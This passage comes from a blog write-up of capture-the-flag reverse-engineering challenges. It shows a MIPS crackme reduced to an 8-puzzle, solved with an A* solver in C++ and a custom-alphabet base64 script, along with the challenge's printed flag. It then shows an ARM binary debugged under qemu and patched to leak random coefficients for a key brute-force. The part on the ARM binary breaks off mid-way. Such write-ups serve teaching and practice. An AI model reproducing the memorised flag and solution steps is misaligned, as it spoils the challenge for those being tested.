class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/J7KAlX5oYTybhPQ.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>v4 and v5 are computed a little above the switch.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/icjk6frdNyuH5Fq.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>In the end (v4, v5) is simply the position of the 0 in the array, and the array is best read as a 3×3 grid.</p><p>That is:</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="code"><pre><span class="line">4 0 3</span><br><span class="line">7 2 6</span><br><span class="line">8 1 5</span><br></pre></td></tr></table></figure></div><p>Finally, the check in sub_400FFC():</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/yZU2Fcs7OLIbGDg.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>requires the 3×3 grid to become</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="code"><pre><span class="line">1 2 3</span><br><span class="line">4 5 6</span><br><span class="line">7 8 0</span><br></pre></td></tr></table></figure></div><p>With 0 as the empty cell, this is the 3×3 sliding-block puzzle (华容道).</p><p>(Or, if you are into algorithms, you may know it as the 8-puzzle.</p><p>Give us a nonogram next time if you dare! I would knock out a 20×20 in no time (grumbling from a nonogram fan)</p><p>What is actually needed is the shortest solution (15 moves); too lazy to write one myself, I grabbed a ready-made solver off the web and adapted it.</p><p>A quick solvability check before searching: ignoring the 0, the permutation 4 3 7 2 6 8 1 5 has 14 inversions, an even number like the target's, so the configuration is reachable. The solver below is C++ (an A* search over board states with the misplaced-tile count as heuristic).</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="CPP"><figure class="iseeu highlight /cpp"><table><tr><td class="code"><pre><span class="line"><span class="comment">#include <iostream></span></span><br><span class="line"><span class="comment">#include <vector></span></span><br><span 
class="line"><span class="comment">#include <ctime></span></span><br><span class="line"><span class="comment">#include <cstdlib></span></span><br><span class="line"><span class="comment">#define maxState 10000</span></span><br><span class="line"><span class="comment">#define N 3</span></span><br><span class="line">using namespace std;</span><br><span class="line"></span><br><span class="line">bool isEqual(int a[N][N][maxState],int b[N][N],int n){</span><br><span class="line"> <span class="keyword">for</span>(int i = <span class="number">0</span>;i < N;i ++){</span><br><span class="line"> <span class="keyword">for</span>(int j = <span class="number">0</span>;j < N;j ++){</span><br><span class="line"> <span class="keyword">if</span>(a[i][j][n] != b[i][j]) <span class="keyword">return</span> false;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> true;</span><br><span class="line">}</span><br><span class="line">bool isEqual(int a[N][N],int b[N][N]){</span><br><span class="line"> <span class="keyword">for</span>(int i = <span class="number">0</span>;i < N;i ++){</span><br><span class="line"> <span class="keyword">for</span>(int j = <span class="number">0</span>;j < N;j ++){</span><br><span class="line"> <span class="keyword">if</span>(a[i][j] != b[i][j]) <span class="keyword">return</span> false;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> true;</span><br><span class="line">}</span><br><span class="line">int evalute(int state[N][N],int target[N][N]){</span><br><span class="line"> int num = <span class="number">0</span>;</span><br><span class="line"> <span class="keyword">for</span>(int i = <span class="number">0</span>;i < N;i ++){</span><br><span class="line"> <span class="keyword">for</span>(int j = <span class="number">0</span>;j < N;j ++)</span><br><span class="line"> <span 
class="keyword">if</span>(state[i][j] != target[i][j]) num ++;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> num;</span><br><span class="line">}</span><br><span class="line">void findBrack(int a[N][N],int x,int y){</span><br><span class="line"> <span class="keyword">for</span>(int i = <span class="number">0</span>;i < N;i ++){</span><br><span class="line"> <span class="keyword">for</span>(int j = <span class="number">0</span>;j < N;j ++){</span><br><span class="line"> <span class="keyword">if</span>(a[i][j] == <span class="number">0</span>) {</span><br><span class="line"> x = i;y = j;<span class="keyword">return</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line">bool move(int a[N][N],int b[N][N],int dir){</span><br><span class="line"> //<span class="number">1</span> up <span class="number">2</span> down <span class="number">3</span> left <span class="number">4</span> right</span><br><span class="line"> int x = <span class="number">0</span>,y = <span class="number">0</span>;</span><br><span class="line"> <span class="keyword">for</span>(int i = <span class="number">0</span>;i < N;i ++){</span><br><span class="line"> <span class="keyword">for</span>(int j = <span class="number">0</span>;j < N;j ++){</span><br><span class="line"> b[i][j] = a[i][j];</span><br><span class="line"> <span class="keyword">if</span>(a[i][j] == <span class="number">0</span>) {</span><br><span class="line"> x = i;y = j;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">if</span>(x == <span class="number">0</span> && dir == <span class="number">1</span>) <span class="keyword">return</span> false;</span><br><span class="line"> <span class="keyword">if</span>(x == N<span class="number">-1</span> && dir == <span class="number">2</span>) 
<span class="keyword">return</span> false;</span><br><span class="line"> <span class="keyword">if</span>(y == <span class="number">0</span> && dir == <span class="number">3</span>) <span class="keyword">return</span> false;</span><br><span class="line"> <span class="keyword">if</span>(y == N<span class="number">-1</span> && dir == <span class="number">4</span>) <span class="keyword">return</span> false;</span><br><span class="line"> <span class="keyword">if</span>(dir == <span class="number">1</span>){b[x<span class="number">-1</span>][y] = <span class="number">0</span>;b[x][y] = a[x<span class="number">-1</span>][y];}</span><br><span class="line"> <span class="keyword">else</span> <span class="keyword">if</span>(dir == <span class="number">2</span>){b[x+<span class="number">1</span>][y] = <span class="number">0</span>;b[x][y] = a[x+<span class="number">1</span>][y];}</span><br><span class="line"> <span class="keyword">else</span> <span class="keyword">if</span>(dir == <span class="number">3</span>){b[x][y<span class="number">-1</span>] = <span class="number">0</span>;b[x][y] = a[x][y<span class="number">-1</span>];}</span><br><span class="line"> <span class="keyword">else</span> <span class="keyword">if</span>(dir == <span class="number">4</span>){b[x][y+<span class="number">1</span>] = <span class="number">0</span>;b[x][y] = a[x][y+<span class="number">1</span>];}</span><br><span class="line"> <span class="keyword">else</span> <span class="keyword">return</span> false;</span><br><span class="line"> <span class="keyword">return</span> true;</span><br><span class="line">}</span><br><span class="line">void statecpy(int a[N][N][maxState],int b[N][N],int n){</span><br><span class="line"> <span class="keyword">for</span>(int i = <span class="number">0</span>;i < N;i ++){</span><br><span class="line"> <span class="keyword">for</span>(int j = <span class="number">0</span>;j < N;j ++){</span><br><span class="line"> a[i][j][n] = b[i][j];</span><br><span class="line"> 
}</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line">void getState(int a[N][N][maxState],int b[N][N],int n){</span><br><span class="line"> <span class="keyword">for</span>(int i = <span class="number">0</span>;i < N;i ++){</span><br><span class="line"> <span class="keyword">for</span>(int j = <span class="number">0</span>;j < N;j ++){</span><br><span class="line"> b[i][j] = a[i][j][n];</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line">void statecpy(int a[N][N],int b[N][N]){</span><br><span class="line"> <span class="keyword">for</span>(int i = <span class="number">0</span>;i < N;i++){</span><br><span class="line"> <span class="keyword">for</span>(int j = <span class="number">0</span>;j < N;j++)</span><br><span class="line"> a[i][j] = b[i][j];</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line">int checkAdd(int a[N][N][maxState],int b[N][N],int n){</span><br><span class="line"> <span class="keyword">for</span>(int i = <span class="number">0</span>;i < n;i ++){</span><br><span class="line"> <span class="keyword">if</span>(isEqual(a,b,i)) <span class="keyword">return</span> i;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line">}</span><br><span class="line">int Astar(int a[N][N][maxState],int start[N][N],int target[N][N],int path[maxState]){</span><br><span class="line"> bool visited[maxState] = {false};</span><br><span class="line"> int fitness[maxState] = {<span class="number">0</span>};</span><br><span class="line"> int passLen[maxState] = {<span class="number">0</span>};</span><br><span class="line"> int curpos[N][N];</span><br><span class="line"> statecpy(curpos,start);</span><br><span class="line"> int id = <span class="number">0</span>,Curid = <span class="number">0</span>;</span><br><span class="line"> 
fitness[id] = evalute(curpos,target);</span><br><span class="line"> statecpy(a,start,id++);</span><br><span class="line"> <span class="keyword">while</span>(!isEqual(curpos,target)){</span><br><span class="line"> <span class="keyword">for</span>(int i = <span class="number">1</span>;i < <span class="number">5</span>;i ++){//try the four move directions</span><br><span class="line"> int tmp[N][N] = {<span class="number">0</span>};</span><br><span class="line"> <span class="keyword">if</span>(move(curpos,tmp,i)){</span><br><span class="line"> int state = checkAdd(a,tmp,id);</span><br><span class="line"> <span class="keyword">if</span>(state == <span class="number">-1</span>){//<span class="keyword">not</span> seen yet: add the state</span><br><span class="line"> path[id] = Curid;</span><br><span class="line"> passLen[id] = passLen[Curid] + <span class="number">1</span>;</span><br><span class="line"> fitness[id] = evalute(tmp,target) + passLen[id];</span><br><span class="line"> statecpy(a,tmp,id++);</span><br><span class="line"> }<span class="keyword">else</span>{//already seen: keep the cheaper path</span><br><span class="line"> int len = passLen[Curid] + <span class="number">1</span>,fit = evalute(tmp,target) + len;</span><br><span class="line"> <span class="keyword">if</span>(fit < fitness[state]){</span><br><span class="line"> path[state] = Curid;</span><br><span class="line"> passLen[state] = len;</span><br><span class="line"> fitness[state] = fit;</span><br><span class="line"> visited[state] = false;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> visited[Curid] = true;</span><br><span class="line"> //pick the unvisited state with the lowest fitness as the next node to expand</span><br><span class="line"> int minCur = <span class="number">-1</span>;</span><br><span class="line"> <span class="keyword">for</span>(int i = <span class="number">0</span>;i < id;i ++)</span><br><span class="line"> <span class="keyword">if</span>(!visited[i] && (minCur == <span class="number">-1</span> || 
fitness[i] < fitness[minCur])) minCur = i;</span><br><span class="line"> Curid = minCur;</span><br><span class="line"> getState(a,curpos,Curid);</span><br><span class="line"> <span class="keyword">if</span>(id == maxState) <span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> Curid;</span><br><span class="line">}</span><br><span class="line">void show(int a[N][N][maxState],int n){</span><br><span class="line"> cout << <span class="string">"-------------------------------\n"</span>;</span><br><span class="line"> <span class="keyword">for</span>(int i = <span class="number">0</span>;i < N;i ++){</span><br><span class="line"> <span class="keyword">for</span>(int j =<span class="number">0</span>;j < N;j ++){</span><br><span class="line"> cout << a[i][j][n] << <span class="string">" "</span>;</span><br><span class="line"> }</span><br><span class="line"> cout << endl;</span><br><span class="line"> }</span><br><span class="line"> cout << <span class="string">"-------------------------------\n"</span>;</span><br><span class="line">}</span><br><span class="line">int calDe(int a[N][N]){</span><br><span class="line"> int sum = <span class="number">0</span>;</span><br><span class="line"> <span class="keyword">for</span>(int i = <span class="number">0</span>;i < N*N;i ++){</span><br><span class="line"> <span class="keyword">for</span>(int j = i+<span class="number">1</span>;j < N*N;j ++){</span><br><span class="line"> int m,n,c,d;</span><br><span class="line"> m = i/N;n = i%N;</span><br><span class="line"> c = j/N;d = j%N;</span><br><span class="line"> <span class="keyword">if</span>(a[c][d] == <span class="number">0</span>) <span class="keyword">continue</span>;</span><br><span class="line"> <span class="keyword">if</span>(a[m][n] > a[c][d]) sum ++;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span 
class="keyword">return</span> sum;</span><br><span class="line">}</span><br><span class="line">void autoGenerate(int a[N][N]){</span><br><span class="line"> int maxMove = <span class="number">50</span>;</span><br><span class="line"> srand((unsigned)time(NULL));</span><br><span class="line"> int tmp[N][N];</span><br><span class="line"> <span class="keyword">while</span>(maxMove --){</span><br><span class="line"> int dir = rand()%<span class="number">4</span> + <span class="number">1</span>;</span><br><span class="line"> <span class="keyword">if</span>(move(a,tmp,dir)) statecpy(a,tmp);</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line">int main(){</span><br><span class="line"> int a[N][N][maxState] = {<span class="number">0</span>};</span><br><span class="line"> // int start[N][N] = {<span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>,<span class="number">4</span>,<span class="number">5</span>,<span class="number">6</span>,<span class="number">7</span>,<span class="number">8</span>,<span class="number">0</span>};</span><br><span class="line"> // autoGenerate(start);</span><br><span class="line"> // cout << start[<span class="number">0</span>][<span class="number">0</span>] << start[<span class="number">1</span>][<span class="number">1</span>];</span><br><span class="line"> int start[N][N] = {<span class="number">4</span>,<span class="number">0</span>,<span class="number">3</span>,<span class="number">7</span>,<span class="number">2</span>,<span class="number">6</span>,<span class="number">8</span>,<span class="number">1</span>,<span class="number">5</span>};</span><br><span class="line"> int target[N][N] = {<span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>,<span class="number">4</span>,<span class="number">5</span>,<span class="number">6</span>,<span class="number">7</span>,<span class="number">8</span>,<span class="number">0</span>};</span><br><span 
class="line"> <span class="keyword">if</span>(!(calDe(start)%<span class="number">2</span> == calDe(target)%<span class="number">2</span>)){//inversion-count parity must match, otherwise the puzzle is unsolvable</span><br><span class="line"> cout << <span class="string">"无解\n"</span>;</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line"> }</span><br><span class="line"> int path[maxState] = {<span class="number">0</span>};</span><br><span class="line"> int res = Astar(a,start,target,path);</span><br><span class="line"> <span class="keyword">if</span>(res == <span class="number">-1</span>){</span><br><span class="line"> cout << <span class="string">"达到最大搜索能力\n"</span>;</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line"> }</span><br><span class="line"> int shortest[maxState] = {<span class="number">0</span>},j = <span class="number">0</span>;</span><br><span class="line"> <span class="keyword">while</span>(res != <span class="number">0</span>){</span><br><span class="line"> shortest[j++] = res;</span><br><span class="line"> res = path[res];</span><br><span class="line"> }</span><br><span class="line"> cout << <span class="string">"第 0 步\n"</span>;</span><br><span class="line"> show(a,<span class="number">0</span>);</span><br><span class="line"> <span class="keyword">for</span>(int i = j - <span class="number">1</span>;i >= <span class="number">0</span>;i --){</span><br><span class="line"> cout << <span class="string">"第 "</span> << j-i << <span class="string">" 步\n"</span>;</span><br><span class="line"> show(a,shortest[i]);</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure></div><p>This gives the board at every step, and the move string can then be written out from the switch mapping.</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" 
contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line">第 <span class="number">0</span> 步</span><br><span class="line">-------------------------------</span><br><span class="line"><span class="number">4</span> <span class="number">0</span> <span class="number">3</span></span><br><span class="line"><span class="number">7</span> <span class="number">2</span> <span class="number">6</span></span><br><span class="line"><span class="number">8</span> <span class="number">1</span> <span class="number">5</span></span><br><span class="line">-------------------------------</span><br><span class="line">第 <span class="number">1</span> 步</span><br><span class="line">-------------------------------</span><br><span class="line"><span class="number">4</span> <span class="number">2</span> <span class="number">3</span></span><br><span class="line"><span class="number">7</span> <span class="number">0</span> <span class="number">6</span></span><br><span class="line"><span class="number">8</span> <span class="number">1</span> <span class="number">5</span></span><br><span class="line">-------------------------------</span><br><span class="line">第 <span class="number">2</span> 步</span><br><span class="line">-------------------------------</span><br><span class="line"><span class="number">4</span> <span class="number">2</span> <span class="number">3</span></span><br><span class="line"><span class="number">7</span> <span class="number">1</span> <span class="number">6</span></span><br><span class="line"><span class="number">8</span> <span class="number">0</span> <span class="number">5</span></span><br><span class="line">-------------------------------</span><br><span class="line">第 <span class="number">3</span> 步</span><br><span class="line">-------------------------------</span><br><span class="line"><span class="number">4</span> <span class="number">2</span> <span class="number">3</span></span><br><span 
class="line"><span class="number">7</span> <span class="number">1</span> <span class="number">6</span></span><br><span class="line"><span class="number">8</span> <span class="number">5</span> <span class="number">0</span></span><br><span class="line">-------------------------------</span><br><span class="line">第 <span class="number">4</span> 步</span><br><span class="line">-------------------------------</span><br><span class="line"><span class="number">4</span> <span class="number">2</span> <span class="number">3</span></span><br><span class="line"><span class="number">7</span> <span class="number">1</span> <span class="number">0</span></span><br><span class="line"><span class="number">8</span> <span class="number">5</span> <span class="number">6</span></span><br><span class="line">-------------------------------</span><br><span class="line">第 <span class="number">5</span> 步</span><br><span class="line">-------------------------------</span><br><span class="line"><span class="number">4</span> <span class="number">2</span> <span class="number">0</span></span><br><span class="line"><span class="number">7</span> <span class="number">1</span> <span class="number">3</span></span><br><span class="line"><span class="number">8</span> <span class="number">5</span> <span class="number">6</span></span><br><span class="line">-------------------------------</span><br><span class="line">第 <span class="number">6</span> 步</span><br><span class="line">-------------------------------</span><br><span class="line"><span class="number">4</span> <span class="number">0</span> <span class="number">2</span></span><br><span class="line"><span class="number">7</span> <span class="number">1</span> <span class="number">3</span></span><br><span class="line"><span class="number">8</span> <span class="number">5</span> <span class="number">6</span></span><br><span class="line">-------------------------------</span><br><span class="line">第 <span class="number">7</span> 步</span><br><span 
class="line">-------------------------------</span><br><span class="line"><span class="number">4</span> <span class="number">1</span> <span class="number">2</span></span><br><span class="line"><span class="number">7</span> <span class="number">0</span> <span class="number">3</span></span><br><span class="line"><span class="number">8</span> <span class="number">5</span> <span class="number">6</span></span><br><span class="line">-------------------------------</span><br><span class="line">第 <span class="number">8</span> 步</span><br><span class="line">-------------------------------</span><br><span class="line"><span class="number">4</span> <span class="number">1</span> <span class="number">2</span></span><br><span class="line"><span class="number">7</span> <span class="number">5</span> <span class="number">3</span></span><br><span class="line"><span class="number">8</span> <span class="number">0</span> <span class="number">6</span></span><br><span class="line">-------------------------------</span><br><span class="line">第 <span class="number">9</span> 步</span><br><span class="line">-------------------------------</span><br><span class="line"><span class="number">4</span> <span class="number">1</span> <span class="number">2</span></span><br><span class="line"><span class="number">7</span> <span class="number">5</span> <span class="number">3</span></span><br><span class="line"><span class="number">0</span> <span class="number">8</span> <span class="number">6</span></span><br><span class="line">-------------------------------</span><br><span class="line">第 <span class="number">10</span> 步</span><br><span class="line">-------------------------------</span><br><span class="line"><span class="number">4</span> <span class="number">1</span> <span class="number">2</span></span><br><span class="line"><span class="number">0</span> <span class="number">5</span> <span class="number">3</span></span><br><span class="line"><span class="number">7</span> <span class="number">8</span> 
<span class="number">6</span></span><br><span class="line">-------------------------------</span><br><span class="line">第 <span class="number">11</span> 步</span><br><span class="line">-------------------------------</span><br><span class="line"><span class="number">0</span> <span class="number">1</span> <span class="number">2</span></span><br><span class="line"><span class="number">4</span> <span class="number">5</span> <span class="number">3</span></span><br><span class="line"><span class="number">7</span> <span class="number">8</span> <span class="number">6</span></span><br><span class="line">-------------------------------</span><br><span class="line">第 <span class="number">12</span> 步</span><br><span class="line">-------------------------------</span><br><span class="line"><span class="number">1</span> <span class="number">0</span> <span class="number">2</span></span><br><span class="line"><span class="number">4</span> <span class="number">5</span> <span class="number">3</span></span><br><span class="line"><span class="number">7</span> <span class="number">8</span> <span class="number">6</span></span><br><span class="line">-------------------------------</span><br><span class="line">第 <span class="number">13</span> 步</span><br><span class="line">-------------------------------</span><br><span class="line"><span class="number">1</span> <span class="number">2</span> <span class="number">0</span></span><br><span class="line"><span class="number">4</span> <span class="number">5</span> <span class="number">3</span></span><br><span class="line"><span class="number">7</span> <span class="number">8</span> <span class="number">6</span></span><br><span class="line">-------------------------------</span><br><span class="line">第 <span class="number">14</span> 步</span><br><span class="line">-------------------------------</span><br><span class="line"><span class="number">1</span> <span class="number">2</span> <span class="number">3</span></span><br><span class="line"><span 
class="number">4</span> <span class="number">5</span> <span class="number">0</span></span><br><span class="line"><span class="number">7</span> <span class="number">8</span> <span class="number">6</span></span><br><span class="line">-------------------------------</span><br><span class="line">第 <span class="number">15</span> 步</span><br><span class="line">-------------------------------</span><br><span class="line"><span class="number">1</span> <span class="number">2</span> <span class="number">3</span></span><br><span class="line"><span class="number">4</span> <span class="number">5</span> <span class="number">6</span></span><br><span class="line"><span class="number">7</span> <span class="number">8</span> <span class="number">0</span></span><br><span class="line">-------------------------------</span><br><span class="line"></span><br><span class="line"><span class="number">6</span> left</span><br><span class="line"><span class="number">2</span> up</span><br><span class="line"><span class="number">4</span> right</span><br><span class="line"><span class="number">8</span> down</span><br><span class="line">// <span class="number">884226886224488</span></span><br></pre></td></tr></table></figure></div><p>The path is "884226886224488".</p><p>Next, look at the part of main above the check: sub_409070() is actually a scanf, and dword_4A1B60 is our input, i.e. the final flag; the input is processed in between before it becomes the string "884226886224488".</p><p>Digging around inside turns up sub_400B58(), which looks like base64 with a substituted alphabet.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/L6cnUY18EAKhoxr.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>So let's try writing a script to do the encoding.</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> base64</span><br><span class="line">b64table=<span 
class="string">"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"</span></span><br><span class="line">mytable=<span class="string">""</span></span><br><span class="line">offset=<span class="number">-18</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(len(b64table)):</span><br><span class="line"> mytable+=b64table[(i+offset)%len(b64table)]</span><br><span class="line">text=<span class="string">"884226886224488"</span>.encode()</span><br><span class="line">cipher=base64.b64encode(text).decode().translate(str.maketrans(b64table,mytable))</span><br><span class="line">print(cipher)</span><br></pre></td></tr></table></figure></div><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/wLeNVSOIGbaT3kp.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>Let's see whether it passes the check.</p><p>Run it under WSL (qemu has to be installed to execute it, given the unusual architecture):</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="code"><pre><span class="line">cp $(which qemu-mips) .</span><br><span class="line">./qemu-mips -L . 
./puzzle</span><br></pre></td></tr></table></figure></div><p>Run the MIPS program and enter the string produced by the script: it succeeds, and we get the flag.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/gEW5ToHm3iCdrwR.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p><strong>flag{8xOi6R2k8xOk6R2i7xOm}</strong></p><h2 id="aRm"><a href="#aRm" class="headerlink" title="aRm"></a>aRm</h2><p>ARM architecture.</p><p>As usual, find the main function by tracing back from the strings.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/KciRx98Oktl574I.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/P6OLQ3l8tGuACgU.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>v1 is the key and v9 is the input flag; the only constraints on the input are that it is 42 characters long and starts with "flag{" and ends with "}".</p><p>Dynamic debugging shows that sub_27770() actually copies the 42 bytes of the unk_723A0 array into v8.</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="code"><pre><span class="line">./qemu-arm -L ./ -g 12345 ./aRm</span><br></pre></td></tr></table></figure></div><p>(For Debugger choose Remote GDB debugger and fill in the port number; for the rest of the configuration see the ELF debugging part of <a href="https://c10udlnk.top/2020/12/14/reSkillsOn-Debugging/" target="_blank" rel="noopener">RE Tricks - On dynamic debugging with the IDA 7.0 front end | c10udlnk_Log</a>.)</p><p>Now the only unknowns left are v5 and v6: v5 depends on the output of sub_1714C(), and v6 here amounts to a system of 42 linear equations in 42 unknowns (with the input unknown).</p><p>sub_105B4() prints the 42 results, so we know that as long as the program prints the 42 numbers in output.txt, the input is the correct flag.</p><p>Since there is a sub_169AC(key) earlier and here a parameterless sub_1714C()+1, the guess is srand(seed) and rand().</p><p>To confirm the guess, run the program several times with the same key and the same/different flags: v5 is identical every time, which together with the pseudo-randomness of rand() confirms that this is the random function.</p><p>Since the key is only one byte (0~255), just brute-force it. Read in the data from output.txt and solve the equations with sympy; if the first solution x0 equals <code>ord('f')^v8[0]=102^0xA0=198</code>, this key is very likely the correct one.</p><p>Of course, before that we first need to know the value of v5 (i.e. the coefficients of the equations) on each iteration.</p><p>So hook the function: after v5 is generated, reuse the print function and format string that the program already has to print every generated v5.</p><p>Remember that there is a function which prints an eight-digit hexadecimal number, namely sub_105B4(); we can use the printf inside it and nop out the place where this function is called (keep the goal clear: right now it is to brute-force the key, so the program's normal behaviour doesn't matter, hahah).</p><blockquote><p>I originally wanted to build a printf call myself, but for some reason keypatch could not interpret <code>LDR R0, =a08x</code>, so I had to take a small detour.</p></blockquote><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/c6iquNsdGHzAemV.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>Switch to the assembly view and note the loc here; we will be jumping to it later.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/PsZHxBAOQKvFUEj.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>Look back at the place in the original double loop where v5 is produced.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/92lTItrMAqsSHxP.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>These instructions correspond to the line <code>v5 = (unsigned __int8)(sub_1714C() + 1);</code> in the F5 output; we start modifying from the line after it.</p><p>Note that the modifiable range is the blue box: it is the <code>v6[j] += (unsigned __int8)v9[k] * v5;</code> we don't need, so anything within this range can be changed freely, and the rest is nopped out.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/nsExR1OZfkurFJj.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>Enter the assembly directly with keypatch; the patched instructions are</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img 
src="https://i.loli.net/2021/01/11/h6HPswAX9mj8KBg.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>(Really only one line was changed, to <code>B loc_105D4</code>; the rest can simply be filled with NOPs.)</p><p>Next go to loc_105D4 and rework it.</p><p>We know that register R3 currently holds the value of v5, so calling printf to print R3 directly achieves the goal.</p><p>In ARM assembly, function arguments are passed in R0, R1, ... so here we just need to put the value of R3 into R1.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/MQeLXrOTJ2HqmaV.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>This is already <code>MOV R1, R3</code>, so it needs no change; just nop out what comes before it.</p><p>Because v5 is taken as (unsigned __int8), change the format here from "%08x" to "%02x", and the output is v5.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/pXCytkh1iYEdzOR.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>Don't forget that we have to jump back afterwards; find the address:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/GKd2eHQiFbMrOAx.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>patch:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/YycGPMOC5fWIDJr.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>Remember to nop out the call to sub_105B4() as well.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/z5TpOXu7FfJkrda.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>Finally, save the patched bytes.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/WNblUYCMOGkf6iF.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>Run it as a test; we get:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/11/z8jeYPCZv43pEbV.png" alt="" title=""> </div> <div 
